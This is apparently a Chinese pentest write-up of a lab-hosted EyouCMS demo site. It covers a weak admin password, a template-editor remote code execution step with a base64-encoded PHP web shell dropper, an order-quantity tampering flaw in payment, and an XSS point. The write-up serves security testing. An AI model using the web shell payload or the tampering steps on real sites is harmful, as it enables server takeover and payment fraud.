易优demo网站测试结果

易优demo网站测试结果-06

1、信息收集

网站账号:admin 密码:Aa123456

2、存在的漏洞

2.1 后台弱口令漏洞

http://eyoucms-s347fqn.gxalabs.com/login.php?s=Admin/login

网站账号:admin 密码:Aa123456

成功登陆

易优demo网站测试结果_第1张图片

2.2 代码远程执行漏洞

漏洞链接
http://xxxx.com/login.php

易优demo网站测试结果_第2张图片

点击进入之后是这个样子

易优demo网站测试结果_第3张图片

选择pc文件下的index文件

易优demo网站测试结果_第4张图片

输入一句话代码

 file_put_contents("./uploads/shell.php",base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbNjY2XSk7Pz4="));?>

点击确认提交

然后返回首页,访问upload/shell.php 文件

易优demo网站测试结果_第5张图片

代码执行成功

连接蚁剑,成功连接

易优demo网站测试结果_第6张图片

2.3 支付漏洞

漏洞链接
http://eyoucms-s347fqn.gxalabs.com/?m=home&c=View&a=index&aid=100

点击立即购买

易优demo网站测试结果_第7张图片

抓包修改数量为2

易优demo网站测试结果_第8张图片

点击提交订单

易优demo网站测试结果_第9张图片

易优demo网站测试结果_第10张图片

易优demo网站测试结果_第11张图片

然后就会发现,金额不对

原价5499*2=10998

易优demo网站测试结果_第12张图片

2.6 xss漏洞

漏洞点基本信息

http://eyoucms.gxalabs.com/login.php

易优demo网站测试结果_第13张图片

易优demo网站测试结果_第14张图片

你可能感兴趣的:(经验分享,笔记,xss)